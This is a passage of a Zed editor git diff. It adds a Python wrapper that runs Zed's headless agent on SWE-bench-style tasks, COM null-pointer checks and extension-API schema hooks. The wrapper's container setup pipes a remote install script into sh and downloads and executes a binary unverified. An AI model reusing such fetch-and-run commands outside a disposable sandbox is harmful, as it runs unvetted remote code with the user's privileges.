eprintln!("[tool] {name} ✗"); + } + acp_thread::ToolCallStatus::Rejected => { + eprintln!("[tool] {name} rejected"); + } + acp_thread::ToolCallStatus::Canceled => { + eprintln!("[tool] {name} canceled"); + } + _ => {} + } + } + } + } + acp_thread::AcpThreadEvent::Stopped(reason) => { + eprintln!("\n[eval-cli] stopped: {reason:?}"); + } + acp_thread::AcpThreadEvent::Error => { + eprintln!("[eval-cli] error event"); + } + acp_thread::AcpThreadEvent::Retry(status) => { + eprintln!("[eval-cli] retry: {status:?}"); + } + acp_thread::AcpThreadEvent::SubagentSpawned(session_id) => { + eprintln!("[eval-cli] subagent spawned: {session_id}"); + } + _ => {} + } +} diff --git a/crates/eval_cli/zed_eval/__init__.py b/crates/eval_cli/zed_eval/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..8cf07a06883a70660eb4bb3ca5a20ae304e6871b --- /dev/null +++ b/crates/eval_cli/zed_eval/__init__.py @@ -0,0 +1,3 @@ +from zed_eval.agent import ZedAgent + +__all__ = ["ZedAgent"] diff --git a/crates/eval_cli/zed_eval/agent.py b/crates/eval_cli/zed_eval/agent.py new file mode 100644 index 0000000000000000000000000000000000000000..54403e9a2531fdf772330ea986e45a37cf62418a --- /dev/null +++ b/crates/eval_cli/zed_eval/agent.py @@ -0,0 +1,437 @@ +"""Harbor agent wrapper for Zed's eval-cli binary. + +Usage: + # Build eval-cli locally first: + cargo build --release -p eval_cli + + # Run via Harbor with a local binary: + harbor run -d "dataset@version" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ae binary_path=/path/to/target/release/eval-cli \ + --agent-model anthropic/claude-sonnet-4-6-latest + + # Or with a download URL (for CI): + harbor run -d "dataset@version" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ae download_url=https://example.com/eval-cli \ + --agent-model anthropic/claude-sonnet-4-6-latest +""" + +import json +import os +import shlex +from pathlib import Path + +from harbor.agents.installed.base import BaseInstalledAgent, with_prompt_template +from harbor.environments.base import BaseEnvironment +from harbor.models.agent.context import AgentContext + + +class ZedAgent(BaseInstalledAgent): + """Runs Zed's headless AI agent (eval-cli) to solve tasks. + + The eval-cli binary boots a headless GPUI application and uses the same + NativeAgent + AcpThread pipeline as the production Zed editor, driving + the full agentic loop (tool calls, subagents, retries) without a GUI. + """ + + def __init__( + self, + logs_dir: Path, + binary_path: str | None = None, + download_url: str | None = None, + *args, + **kwargs, + ): + super().__init__(logs_dir, *args, **kwargs) + self._binary_path = binary_path + self._download_url = download_url or os.environ.get("EVAL_CLI_DOWNLOAD_URL") + + @staticmethod + def name() -> str: + return "zed" + + async def _detect_workdir(self, environment: BaseEnvironment) -> str: + """Detect the repo working directory inside the container. + + Checks, in order: + 1. Explicit ``EVAL_CLI_WORKDIR`` extra-env override + 2. ``/app`` (SWE-bench Pro) + 3. ``/testbed`` (SWE-bench Verified) + 4. ``/repo`` + 5. First git repo found under ``/`` (max depth 3) + """ + override = self._extra_env.get("EVAL_CLI_WORKDIR") + if override: + return override + + result = await self.exec_as_agent( + environment, + command=( + "for d in /app /testbed /repo; do " + ' if [ -d "$d/.git" ]; then echo "$d"; exit 0; fi; ' + "done; " + "find / -maxdepth 3 -name .git -type d 2>/dev/null " + '| head -1 | sed "s|/.git$||"' + ), + ) + workdir = result.stdout.strip() + if not workdir: + raise RuntimeError( + "Could not find a git repository in the container. " + "Set EVAL_CLI_WORKDIR explicitly via --ae EVAL_CLI_WORKDIR=/path/to/repo" + ) + return workdir + + async def install(self, environment: BaseEnvironment) -> None: + # Detect the package manager and install base dependencies. + # Supports Debian/Ubuntu (apt-get), Alpine (apk), and + # Fedora/RHEL/CentOS (dnf/yum). + await self.exec_as_root( + environment, + command=( + "if command -v apt-get >/dev/null 2>&1; then " + " apt-get update && " + " apt-get install -y --no-install-recommends ca-certificates curl git; " + "elif command -v apk >/dev/null 2>&1; then " + " apk add --no-cache ca-certificates curl git bash coreutils gcompat libstdc++; " + "elif command -v dnf >/dev/null 2>&1; then " + " dnf install -y ca-certificates curl git; " + "elif command -v yum >/dev/null 2>&1; then " + " yum install -y ca-certificates curl git; " + "else " + " echo 'WARNING: No supported package manager found (apt-get, apk, dnf, yum)' >&2; " + "fi" + ), + env={"DEBIAN_FRONTEND": "noninteractive"}, + ) + + # ── Non-essential tooling ───────────────────────────────────── + # Everything below here (Node.js, LSPs, uv/ruff) is nice-to-have. + # If any step fails (e.g. musl incompatibility, network issues), + # log a warning and continue — the agent can still work without + # pre-installed language servers. + + await self._install_node(environment) + await self._install_lsps(environment) + await self._install_uv_and_ruff(environment) + + if self._binary_path: + binary = Path(self._binary_path) + if not binary.exists(): + raise FileNotFoundError( + f"eval-cli binary not found at {binary}. " + "Build it with: cargo build --release -p eval_cli" + ) + await environment.upload_file( + source_path=binary, + target_path="/usr/local/bin/eval-cli", + ) + await self.exec_as_root( + environment, + command="chmod +x /usr/local/bin/eval-cli && eval-cli --help", + ) + return + + if self._download_url: + await self.exec_as_root( + environment, + command=( + f"curl -fsSL {shlex.quote(self._download_url)} " + "-o /usr/local/bin/eval-cli && " + "chmod +x /usr/local/bin/eval-cli && " + "eval-cli --help" + ), + ) + return + + raise ValueError( + "No eval-cli binary provided. " + "Either pass binary_path=/path/to/target/release/eval-cli " + "or set download_url=/EVAL_CLI_DOWNLOAD_URL." + ) + + async def _install_node(self, environment: BaseEnvironment) -> None: + """Install Node.js from official binary tarballs. + + Uses the musl build on Alpine and the glibc build elsewhere. + Skips if node is already on PATH. + """ + try: + await self.exec_as_root( + environment, + command=( + "if command -v node >/dev/null 2>&1; then " + ' echo "Node.js already available: $(node --version)"; ' + "else " + " NODE_VER=v22.14.0; " + " ARCH=$(uname -m); " + ' case "$ARCH" in ' + " x86_64) NODE_ARCH=x64 ;; " + " aarch64) NODE_ARCH=arm64 ;; " + ' *) echo "WARNING: unsupported arch $ARCH for Node.js" >&2; exit 0 ;; ' + " esac; " + " if ldd /bin/sh 2>&1 | grep -qi musl; then " + ' NODE_URL="https://unofficial-builds.nodejs.org/download/release/${NODE_VER}/node-${NODE_VER}-linux-${NODE_ARCH}-musl.tar.gz"; ' + " else " + ' NODE_URL="https://nodejs.org/dist/${NODE_VER}/node-${NODE_VER}-linux-${NODE_ARCH}.tar.gz"; ' + " fi; " + ' echo "Downloading Node.js from $NODE_URL"; ' + ' curl -fsSL "$NODE_URL" | tar -xz -C /usr/local --strip-components=1; ' + ' echo "Installed Node.js $(node --version)"; ' + "fi" + ), + ) + except Exception as exc: + self.logger.warning("Node.js installation failed (non-fatal): %s", exc) + + async def _install_lsps(self, environment: BaseEnvironment) -> None: + """Pre-install language servers so Zed doesn't download them at runtime. + + Each LSP is installed independently so one failure doesn't block the rest. + """ + # npm-based LSPs — skip all if npm is not available. + try: + await self.exec_as_agent( + environment, + command="command -v npm >/dev/null 2>&1", + ) + except Exception: + self.logger.warning("npm not available — skipping npm-based LSP installs") + return + + lsp_installs = [ + ( + "basedpyright", + 'DIR="$ZED_DATA_DIR/languages/basedpyright"; ' + 'mkdir -p "$DIR" && npm install --prefix "$DIR" --save-exact basedpyright', + ), + ( + "typescript-language-server", + 'DIR="$ZED_DATA_DIR/languages/typescript-language-server"; ' + 'mkdir -p "$DIR" && npm install --prefix "$DIR" --save-exact typescript typescript-language-server', + ), + ( + "vtsls", + 'DIR="$ZED_DATA_DIR/languages/vtsls"; ' + 'mkdir -p "$DIR" && npm install --prefix "$DIR" --save-exact @vtsls/language-server typescript', + ), + ( + "tailwindcss-language-server", + 'DIR="$ZED_DATA_DIR/languages/tailwindcss-language-server"; ' + 'mkdir -p "$DIR" && npm install --prefix "$DIR" --save-exact @tailwindcss/language-server', + ), + ] + + for name, cmd in lsp_installs: + try: + await self.exec_as_agent( + environment, + command=( + 'ZED_DATA_DIR="${XDG_DATA_HOME:-$HOME/.local/share}/zed"; ' + + cmd + ), + ) + except Exception as exc: + self.logger.warning( + "LSP install '%s' failed (non-fatal): %s", name, exc + ) + + # eslint — downloaded from GitHub and compiled separately. + try: + await self.exec_as_agent( + environment, + command=( + "set -euo pipefail; " + 'ZED_DATA_DIR="${XDG_DATA_HOME:-$HOME/.local/share}/zed"; ' + 'ESLINT_DIR="$ZED_DATA_DIR/languages/eslint/vscode-eslint-2.4.4"; ' + 'mkdir -p "$ESLINT_DIR"; ' + 'curl -fsSL "https://github.com/zed-industries/vscode-eslint/archive/refs/tags/release/2.4.4.tar.gz" ' + '| tar -xz -C "$ESLINT_DIR"; ' + 'mv "$ESLINT_DIR"/vscode-eslint-release-2.4.4 "$ESLINT_DIR/vscode-eslint"; ' + 'cd "$ESLINT_DIR/vscode-eslint" && npm install && npm run compile' + ), + ) + except Exception as exc: + self.logger.warning("eslint LSP install failed (non-fatal): %s", exc) + + # gopls — only when Go is present. Guarded by a 120s timeout so slow + # compilation can never eat the full setup budget. + gopls_script = ( + "if command -v go >/dev/null 2>&1; then " + "if go install golang.org/x/tools/gopls@latest 2>/dev/null; then " + "echo 'Installed gopls@latest'; " + "else " + ' MY_GO=$(go env GOVERSION | sed "s/^go//"); ' + " for v in $(curl -fsSL " + "https://proxy.golang.org/golang.org/x/tools/gopls/@v/list 2>/dev/null" + " | grep -E '^v[0-9]+\\.[0-9]+\\.[0-9]+$' | sort -rV | head -5); do " + " NEED=$(curl -fsSL " + '"https://proxy.golang.org/golang.org/x/tools/gopls/@v/${v}.mod"' + " 2>/dev/null | awk '/^go /{print $2; exit}'); " + ' if [ -n "$NEED" ] ' + ' && [ "$(printf \'%s\\n%s\\n\' "$NEED" "$MY_GO" ' + ' | sort -V | head -1)" = "$NEED" ]; then ' + ' echo "Installing gopls $v (compatible with Go $MY_GO)"; ' + ' go install "golang.org/x/tools/gopls@$v" && break; ' + " fi; " + " done; " + "fi; " + "fi" + ) + try: + await self.exec_as_agent( + environment, + command=( + "timeout 120 bash -c " + + shlex.quote(gopls_script) + + " || echo 'WARNING: gopls installation timed out or failed -- skipping'" + ), + ) + except Exception as exc: + self.logger.warning("gopls install failed (non-fatal): %s", exc) + + async def _install_uv_and_ruff(self, environment: BaseEnvironment) -> None: + """Install uv and ruff for Python tooling.""" + try: + await self.exec_as_agent( + environment, + command=( + "curl -LsSf https://astral.sh/uv/install.sh | sh && " + '. "$HOME/.local/bin/env"' + ), + ) + + agent_home_result = await self.exec_as_agent( + environment, + command='printf %s "$HOME"', + ) + agent_home = agent_home_result.stdout.strip() + if not agent_home: + self.logger.warning( + "Could not determine agent home directory — skipping uv symlinks" + ) + return + + await self.exec_as_root( + environment, + command=( + f"ln -sf {shlex.quote(agent_home + '/.local/bin/uv')} /usr/local/bin/uv && " + f"ln -sf {shlex.quote(agent_home + '/.local/bin/uvx')} /usr/local/bin/uvx" + ), + ) + + await self.exec_as_agent( + environment, + command='export PATH="$HOME/.local/bin:$PATH" && uv tool install ruff', + ) + except Exception as exc: + self.logger.warning("uv/ruff installation failed (non-fatal): %s", exc) + + def populate_context_post_run(self, context: AgentContext) -> None: + result_data = None + for json_file in self.logs_dir.rglob("result.json"): + try: + result_data = json.loads(json_file.read_text()) + break + except (json.JSONDecodeError, OSError): + continue + + if result_data is None: + self.logger.warning("Could not find or parse result.json from eval-cli") + return + + if result_data.get("input_tokens") is not None: + context.n_input_tokens = result_data["input_tokens"] + if result_data.get("output_tokens") is not None: + context.n_output_tokens = result_data["output_tokens"] + if result_data.get("cache_read_input_tokens") is not None: + context.n_cache_tokens = result_data["cache_read_input_tokens"] + + context.metadata = { + "status": result_data.get("status"), + "duration_secs": result_data.get("duration_secs"), + "model": result_data.get("model"), + } + + def _get_api_env(self) -> dict[str, str]: + env: dict[str, str] = {} + if not self.model_name or "/" not in self.model_name: + return env + + provider = self.model_name.split("/", 1)[0] + provider_env_map = { + "anthropic": "ANTHROPIC_API_KEY", + "openai": "OPENAI_API_KEY", + "google": "GEMINI_API_KEY", + "gemini": "GEMINI_API_KEY", + "deepseek": "DEEPSEEK_API_KEY", + "mistral": "MISTRAL_API_KEY", + } + + env_var = provider_env_map.get(provider) + if env_var: + api_key = os.environ.get(env_var, "") + if api_key: + env[env_var] = api_key + + return env + + @with_prompt_template + async def run( + self, instruction: str, environment: BaseEnvironment, context: AgentContext + ) -> None: + escaped_instruction = shlex.quote(instruction) + env = self._get_api_env() + + workdir = await self._detect_workdir(environment) + + parts = [ + "eval-cli", + f"--workdir {shlex.quote(workdir)}", + "--output-dir /logs/agent", + ] + + if self.model_name: + parts.append(f"--model {shlex.quote(self.model_name)}") + + timeout = self._extra_env.get("EVAL_CLI_TIMEOUT") + if timeout: + parts.append(f"--timeout {shlex.quote(timeout)}") + + staff = self._extra_env.get("EVAL_CLI_STAFF") + if staff and staff.lower() == "false": + parts.append("--no-staff") + + reasoning_effort = self._extra_env.get("EVAL_CLI_REASONING_EFFORT") + if reasoning_effort: + parts.append(f"--reasoning-effort {shlex.quote(reasoning_effort)}") + + enable_thinking = self._extra_env.get("EVAL_CLI_ENABLE_THINKING") + if enable_thinking: + if enable_thinking.lower() == "true": + parts.append("--enable-thinking") + elif enable_thinking.lower() == "false": + parts.append("--disable-thinking") + + parts.append(f"--instruction {escaped_instruction}") + + await self.exec_as_agent( + environment, + command=( + " ".join(parts) + " 2>&1 | if command -v stdbuf >/dev/null 2>&1;" + " then stdbuf -oL tee /logs/agent/eval-cli.txt;" + " else tee /logs/agent/eval-cli.txt; fi" + ), + env=env, + ) + + await self.exec_as_agent( + environment, + command=( + "git add -A && " + "git diff --cached HEAD > /logs/agent/patch.diff && " + 'echo "Patch size: $(wc -c < /logs/agent/patch.diff) bytes"' + ), + cwd=workdir, + ) diff --git a/crates/eval_cli/zed_eval/pyproject.toml b/crates/eval_cli/zed_eval/pyproject.toml new file mode 100644 index 0000000000000000000000000000000000000000..416c025826eaf99ad029c914b609aa28abd56f00 --- /dev/null +++ b/crates/eval_cli/zed_eval/pyproject.toml @@ -0,0 +1,10 @@ +[project] +name = "zed-eval" +version = "0.1.0" +description = "Harbor agent wrapper for Zed's eval-cli" +requires-python = ">=3.12" +dependencies = ["harbor"] + +[build-system] +requires = ["setuptools"] +build-backend = "setuptools.build_meta" diff --git a/crates/explorer_command_injector/src/explorer_command_injector.rs b/crates/explorer_command_injector/src/explorer_command_injector.rs index bfa2a0326c9975037ed860acfdee7cd32e3075d8..1bd85339a9fd8958c496eccf2bedcb1610c56557 100644 --- a/crates/explorer_command_injector/src/explorer_command_injector.rs +++ b/crates/explorer_command_injector/src/explorer_command_injector.rs @@ -106,18 +106,17 @@ impl IClassFactory_Impl for ExplorerCommandInjectorFactory_Impl { riid: *const windows_core::GUID, ppvobject: *mut *mut core::ffi::c_void, ) -> Result<()> { + if ppvobject.is_null() || riid.is_null() { + return Err(windows::Win32::Foundation::E_POINTER.into()); + } + unsafe { *ppvobject = std::ptr::null_mut(); } + if punkouter.is_none() { let factory: IExplorerCommand = ExplorerCommandInjector {}.into(); - let ret = unsafe { factory.query(riid, ppvobject).ok() }; - if ret.is_ok() { - unsafe { - *ppvobject = factory.into_raw(); - } - } - ret + unsafe { factory.query(riid, ppvobject).ok() } } else { Err(E_INVALIDARG.into()) } @@ -145,19 +144,17 @@ extern "system" fn DllGetClassObject( iid: *const GUID, out: *mut *mut std::ffi::c_void, ) -> HRESULT { + if out.is_null() || class_id.is_null() || iid.is_null() { + return E_INVALIDARG; + } + unsafe { *out = std::ptr::null_mut(); } let class_id = unsafe { *class_id }; if class_id == MODULE_ID { let instance: IClassFactory = ExplorerCommandInjectorFactory {}.into(); - let ret = unsafe { instance.query(iid, out) }; - if ret.is_ok() { - unsafe { - *out = instance.into_raw(); - } - } - ret + unsafe { instance.query(iid, out) } } else { CLASS_E_CLASSNOTAVAILABLE } diff --git a/crates/extension/src/extension.rs b/crates/extension/src/extension.rs index 88f2bea0c0c68480a2ad67f536ecf9d465a6a9ae..2ec8c8ea5f4032522dcaf846736aeacc00de585f 100644 --- a/crates/extension/src/extension.rs +++ b/crates/extension/src/extension.rs @@ -11,7 +11,6 @@ use std::sync::Arc; use ::lsp::LanguageServerName; use anyhow::{Context as _, Result, bail}; use async_trait::async_trait; -use fs::normalize_path; use gpui::{App, Task}; use language::LanguageName; use semver::Version; @@ -57,7 +56,7 @@ pub trait Extension: Send + Sync + 'static { /// Returns a path relative to this extension's working directory. fn path_from_extension(&self, path: &Path) -> PathBuf { - normalize_path(&self.work_dir().join(path)) + util::normalize_path(&self.work_dir().join(path)) } async fn language_server_command( @@ -80,6 +79,18 @@ pub trait Extension: Send + Sync + 'static { worktree: Arc, ) -> Result>; + async fn language_server_initialization_options_schema( + &self, + language_server_id: LanguageServerName, + worktree: Arc, + ) -> Result>; + + async fn language_server_workspace_configuration_schema( + &self, + language_server_id: LanguageServerName, + worktree: Arc, + ) -> Result>; + async fn language_server_additional_initialization_options( &self, language_server_id: LanguageServerName, diff --git a/crates/extension/src/extension_builder.rs b/crates/extension/src/extension_builder.rs index eae51846f164d4aa6baf2fac897d25a8961b4d6c..f0e789994127c9347c8eb6b8d16417ba7eaaf831 100644 --- a/crates/extension/src/extension_builder.rs +++ b/crates/extension/src/extension_builder.rs @@ -7,6 +7,7 @@ use anyhow::{Context as _, Result, bail}; use futures::{StreamExt, io}; use heck::ToSnakeCase; use http_client::{self, AsyncBody, HttpClient}; +use language::LanguageConfig; use serde::Deserialize; use std::{ env, fs, mem, @@ -295,16 +296,12 @@ impl ExtensionBuilder { let remotes_output = util::command::new_command("git") .arg("--git-dir") .arg(&git_dir) - .args(["remote", "-v"]) + .args(["remote", "get-url", "origin"]) + .env("GIT_CONFIG_GLOBAL", "/dev/null") .output() .await?; let has_remote = remotes_output.status.success() - && String::from_utf8_lossy(&remotes_output.stdout) - .lines() - .any(|line| { - let mut parts = line.split(|c: char| c.is_whitespace()); - parts.next() == Some("origin") && parts.any(|part| part == url) - }); + && String::from_utf8_lossy(&remotes_output.stdout).trim() == url; if !has_remote { bail!( "grammar directory '{}' already exists, but is not a git clone of '{}'", @@ -583,7 +580,7 @@ async fn populate_defaults( while let Some(language_dir) = language_dir_entries.next().await { let language_dir = language_dir?; - let config_path = language_dir.join("config.toml"); + let config_path = language_dir.join(LanguageConfig::FILE_NAME); if fs.is_file(config_path.as_path()).await { let relative_language_dir = language_dir.strip_prefix(extension_path)?.to_path_buf(); diff --git a/crates/extension/src/extension_host_proxy.rs b/crates/extension/src/extension_host_proxy.rs index 5efc015483f10915a2e6646c3359bd47b90cfe69..c8bb7ef1343a3772c115f85306dd5631a6f4dd71 100644 --- a/crates/extension/src/extension_host_proxy.rs +++ b/crates/extension/src/extension_host_proxy.rs @@ -8,7 +8,7 @@ use language::{BinaryStatus, LanguageMatcher, LanguageName, LoadedLanguage}; use lsp::LanguageServerName; use parking_lot::RwLock; -use crate::{Extension, SlashCommand}; +use crate::Extension; #[derive(Default)] struct GlobalExtensionHostProxy(Arc); @@ -29,7 +29,6 @@ pub struct ExtensionHostProxy { language_proxy: RwLock>>, language_server_proxy: RwLock>>, snippet_proxy: RwLock>>, - slash_command_proxy: RwLock>>, context_server_proxy: RwLock>>, debug_adapter_provider_proxy: RwLock>>, language_model_provider_proxy: RwLock>>, @@ -55,7 +54,6 @@ impl ExtensionHostProxy { language_proxy: RwLock::default(), language_server_proxy: RwLock::default(), snippet_proxy: RwLock::default(), - slash_command_proxy: RwLock::default(), context_server_proxy: RwLock::default(), debug_adapter_provider_proxy: RwLock::default(), language_model_provider_proxy: RwLock::default(), @@ -82,10 +80,6 @@ impl ExtensionHostProxy { self.snippet_proxy.write().replace(Arc::new(proxy)); } - pub fn register_slash_command_proxy(&self, proxy: impl ExtensionSlashCommandProxy) { - self.slash_command_proxy.write().replace(Arc::new(proxy)); - } - pub fn register_context_server_proxy(&self, proxy: impl ExtensionContextServerProxy) { self.context_server_proxy.write().replace(Arc::new(proxy)); } @@ -356,30 +350,6 @@ impl ExtensionSnippetProxy for ExtensionHostProxy { } } -pub trait ExtensionSlashCommandProxy: Send + Sync + 'static { - fn register_slash_command(&self, extension: Arc, command: SlashCommand); - - fn unregister_slash_command(&self, command_name: Arc); -} - -impl ExtensionSlashCommandProxy for ExtensionHostProxy { - fn register_slash_command(&self, extension: Arc, command: SlashCommand) { - let Some(proxy) = self.slash_command_proxy.read().clone() else { - return; - }; - - proxy.register_slash_command(extension, command) - } - - fn unregister_slash_command(&self, command_name: Arc) { - let Some(proxy) = self.slash_command_proxy.read().clone() else { - return; - }; - - proxy.unregister_slash_command(command_name) - } -} - pub trait ExtensionContextServerProxy: Send + Sync + 'static { fn register_context_server( &self, diff --git a/crates/extension_api/src/extension_api.rs b/crates/extension_api/src/extension_api.rs index acd1cba47b0150b85ddec8baafa8b5f341460a39..6607cdc9697d017ac51818bb277a1392a8d67d01 100644 --- a/crates/extension_api/src/extension_api.rs +++ b/crates/extension_api/src/extension_api.rs @@ -100,6 +100,28 @@ pub trait Extension: Send + Sync { Ok(None) } + /// Returns the JSON schema for the initialization options. + /// + /// The schema must conform to the JSON Schema speification. + fn language_server_initialization_options_schema( + &mut self, + _language_server_id: &LanguageServerId, + _worktree: &Worktree, + ) -> Option { + None + } + + /// Returns the JSON schema for the workspace configuration. + /// + /// The schema must conform to the JSON Schema specification. + fn language_server_workspace_configuration_schema( + &mut self, + _language_server_id: &LanguageServerId, + _worktree: &Worktree, + ) -> Option { + None + } + /// Returns the initialization options to pass to the other language server. fn language_server_additional_initialization_options( &mut self, @@ -370,6 +392,26 @@ impl wit::Guest for Component { .and_then(|value| serde_json::to_string(&value).ok())) } + fn language_server_initialization_options_schema( + language_server_id: String, + worktree: &Worktree, + ) -> Option { + let language_server_id = LanguageServerId(language_server_id); + extension() + .language_server_initialization_options_schema(&language_server_id, worktree) + .and_then(|value| serde_json::to_string(&value).ok()) + } + + fn language_server_workspace_configuration_schema( + language_server_id: String, + worktree: &Worktree, + ) -> Option { + let language_server_id = LanguageServerId(language_server_id); + extension() + .language_server_workspace_configuration_schema(&language_server_id, worktree) + .and_then(|value| serde_json::to_string(&value).ok()) + } + fn language_server_additional_initialization_options( language_server_id: String, target_language_server_id: String, diff --git a/crates/extension_api/src/settings.rs b/crates/extension_api/src/settings.rs index a133a8027a4361c1f92e3fdecc73664497b4e6d6..bb9f2e20b23efd077e37b6c90b245f120c1d6ab9 100644 --- a/crates/extension_api/src/settings.rs +++ b/crates/extension_api/src/settings.rs @@ -1,6 +1,6 @@ //! Provides access to Zed settings. -#[path = "../wit/since_v0.2.0/settings.rs"] +#[path = "../wit/since_v0.8.0/settings.rs"] mod types; use crate::{Project, Result, SettingsLocation, Worktree, wit}; diff --git a/crates/extension_api/wit/since_v0.8.0/extension.wit b/crates/extension_api/wit/since_v0.8.0/extension.wit index fc2735c72b463225feed0d371ae8274b56c78be1..052d670364b6958b51184def893c49f5b6abdc9e 100644 --- a/crates/extension_api/wit/since_v0.8.0/extension.wit +++ b/crates/extension_api/wit/since_v0.8.0/extension.wit @@ -101,6 +101,16 @@ world extension { /// Returns the workspace configuration options to pass to the language server. export language-server-workspace-configuration: func(language-server-id: string, worktree: borrow) -> result, string>; + /// Returns the JSON schema for the initialization options. + /// + /// The schema is represented as a JSON string conforming to the JSON Schema specification. + export language-server-initialization-options-schema: func(language-server-id: string, worktree: borrow) -> option; + + /// Returns the JSON schema for the workspace configuration. + /// + /// The schema is represented as a JSON string conforming to the JSON Schema specification. + export language-server-workspace-configuration-schema: func(language-server-id: string, worktree: borrow) -> option; + /// Returns the initialization options to pass to the other language server. export language-server-additional-initialization-options: func(language-server-id: string, target-language-server-id: string, worktree: borrow) -> result, string>; diff --git a/crates/extension_api/wit/since_v0.8.0/settings.rs b/crates/extension_api/wit/since_v0.8.0/settings.rs index 19e28c1ba955a998fe7b97f3eacb57c4b1104154..7c77dc79baf7ab89bec74b6c66ea5b736d2ba858 100644 --- a/crates/extension_api/wit/since_v0.8.0/settings.rs +++ b/crates/extension_api/wit/since_v0.8.0/settings.rs @@ -6,6 +6,8 @@ use std::{collections::HashMap, num::NonZeroU32}; pub struct LanguageSettings { /// How many columns a tab should occupy. pub tab_size: NonZeroU32, + /// The preferred line length (column at which to wrap). + pub preferred_line_length: u32, } /// The settings for a particular language server. diff --git a/crates/extension_cli/Cargo.toml b/crates/extension_cli/Cargo.toml index 9795c13e75864184299fba026f499bbcbefee117..c019a323196e96d0b7a0131cc518e599154cd350 100644 --- a/crates/extension_cli/Cargo.toml +++ b/crates/extension_cli/Cargo.toml @@ -26,8 +26,10 @@ reqwest_client.workspace = true serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true +settings_content.workspace = true snippet_provider.workspace = true -theme.workspace = true +task.workspace = true +theme_settings.workspace = true tokio = { workspace = true, features = ["full"] } toml.workspace = true tree-sitter.workspace = true diff --git a/crates/extension_cli/src/main.rs b/crates/extension_cli/src/main.rs index baefb72fe4bd986edbfaa866e50663b159eff3c9..57845754fc8263c516bc3aec7d1ae0a2ffe68a2f 100644 --- a/crates/extension_cli/src/main.rs +++ b/crates/extension_cli/src/main.rs @@ -1,3 +1,4 @@ +use std::collections::BTreeSet; use std::collections::HashMap; use std::env; use std::fs; @@ -7,12 +8,15 @@ use std::sync::Arc; use ::fs::{CopyOptions, Fs, RealFs, copy_recursive}; use anyhow::{Context as _, Result, anyhow, bail}; use clap::Parser; +use cloud_api_types::ExtensionProvides; use extension::extension_builder::{CompileExtensionOptions, ExtensionBuilder}; use extension::{ExtensionManifest, ExtensionSnippets}; use language::LanguageConfig; use reqwest_client::ReqwestClient; +use settings_content::SemanticTokenRules; use snippet_provider::file_to_snippets; use snippet_provider::format::VsSnippetsFile; +use task::TaskTemplates; use tokio::process::Command; use tree_sitter::{Language, Query, WasmStore}; @@ -78,10 +82,7 @@ async fn main() -> Result<()> { .context("failed to compile extension")?; let extension_provides = manifest.provides(); - - if extension_provides.is_empty() { - bail!("extension does not provide any features"); - } + validate_extension_features(&extension_provides)?; let grammars = test_grammars(&manifest, &extension_path, &mut wasm_store)?; test_languages(&manifest, &extension_path, &grammars)?; @@ -201,7 +202,7 @@ async fn copy_extension_resources( }, ) .await - .with_context(|| "failed to copy icons")?; + .context("failed to copy icons")?; } for (_, agent_entry) in &manifest.agent_servers { @@ -295,6 +296,22 @@ async fn copy_extension_resources( Ok(()) } +fn validate_extension_features(provides: &BTreeSet) -> Result<()> { + if provides.is_empty() { + bail!("extension does not provide any features"); + } + + if provides.contains(&ExtensionProvides::Themes) && provides.len() != 1 { + bail!("extension must not provide other features along with themes"); + } + + if provides.contains(&ExtensionProvides::IconThemes) && provides.len() != 1 { + bail!("extension must not provide other features along with icon themes"); + } + + Ok(()) +} + fn test_grammars( manifest: &ExtensionManifest, extension_path: &Path, @@ -323,9 +340,8 @@ fn test_languages( ) -> Result<()> { for relative_language_dir in &manifest.languages { let language_dir = extension_path.join(relative_language_dir); - let config_path = language_dir.join("config.toml"); - let config_content = fs::read_to_string(&config_path)?; - let config: LanguageConfig = toml::from_str(&config_content)?; + let config_path = language_dir.join(LanguageConfig::FILE_NAME); + let config = LanguageConfig::load(&config_path)?; let grammar = if let Some(name) = &config.grammar { Some( grammars @@ -339,18 +355,48 @@ fn test_languages( let query_entries = fs::read_dir(&language_dir)?; for entry in query_entries { let entry = entry?; - let query_path = entry.path(); - if query_path.extension() == Some("scm".as_ref()) { - let grammar = grammar.with_context(|| { - format! { - "language {} provides query {} but no grammar", - config.name, - query_path.display() - } - })?; - - let query_source = fs::read_to_string(&query_path)?; - let _query = Query::new(grammar, &query_source)?; + let file_path = entry.path(); + + let Some(file_name) = file_path.file_name().and_then(|name| name.to_str()) else { + continue; + }; + + match file_name { + LanguageConfig::FILE_NAME => { + // Loaded above + } + SemanticTokenRules::FILE_NAME => { + let _token_rules = SemanticTokenRules::load(&file_path)?; + } + TaskTemplates::FILE_NAME => { + let task_file_content = std::fs::read(&file_path).with_context(|| { + anyhow!( + "Failed to read tasks file at {path}", + path = file_path.display() + ) + })?; + let _task_templates = + serde_json_lenient::from_slice::(&task_file_content) + .with_context(|| { + anyhow!( + "Failed to parse tasks file at {path}", + path = file_path.display() + ) + })?; + } + _ if file_name.ends_with(".scm") => { + let grammar = grammar.with_context(|| { + format! { + "language {} provides query {} but no grammar", + config.name, + file_path.display() + } + })?; + + let query_source = fs::read_to_string(&file_path)?; + let _query = Query::new(grammar, &query_source)?; + } + _ => {} } } @@ -367,7 +413,8 @@ async fn test_themes( ) -> Result<()> { for relative_theme_path in &manifest.themes { let theme_path = extension_path.join(relative_theme_path); - let theme_family = theme::read_user_theme(&theme_path, fs.clone()).await?; + let theme_family = + theme_settings::deserialize_user_theme(&fs.load_bytes(&theme_path).await?)?; log::info!("loaded theme family {}", theme_family.name); for theme in &theme_family.themes { diff --git a/crates/extension_host/Cargo.toml b/crates/extension_host/Cargo.toml index c4d1f6d98c82ee348f4a7453a3bb6e3255924b77..8dd949844f03ed7d625a2374aaf99b7c38b6522f 100644 --- a/crates/extension_host/Cargo.toml +++ b/crates/extension_host/Cargo.toml @@ -65,9 +65,10 @@ language = { workspace = true, features = ["test-support"] } language_extension.workspace = true parking_lot.workspace = true project = { workspace = true, features = ["test-support"] } -rand.workspace = true + reqwest_client.workspace = true theme = { workspace = true, features = ["test-support"] } +theme_settings.workspace = true theme_extension.workspace = true zlog.workspace = true diff --git a/crates/extension_host/src/extension_host.rs b/crates/extension_host/src/extension_host.rs index 6699a9dca099177cfd550ba0f68ef62828356d15..03f340a56a98eb826110b245505c2b92774a0e0f 100644 --- a/crates/extension_host/src/extension_host.rs +++ b/crates/extension_host/src/extension_host.rs @@ -17,8 +17,7 @@ use extension::extension_builder::{CompileExtensionOptions, ExtensionBuilder}; use extension::{ ExtensionContextServerProxy, 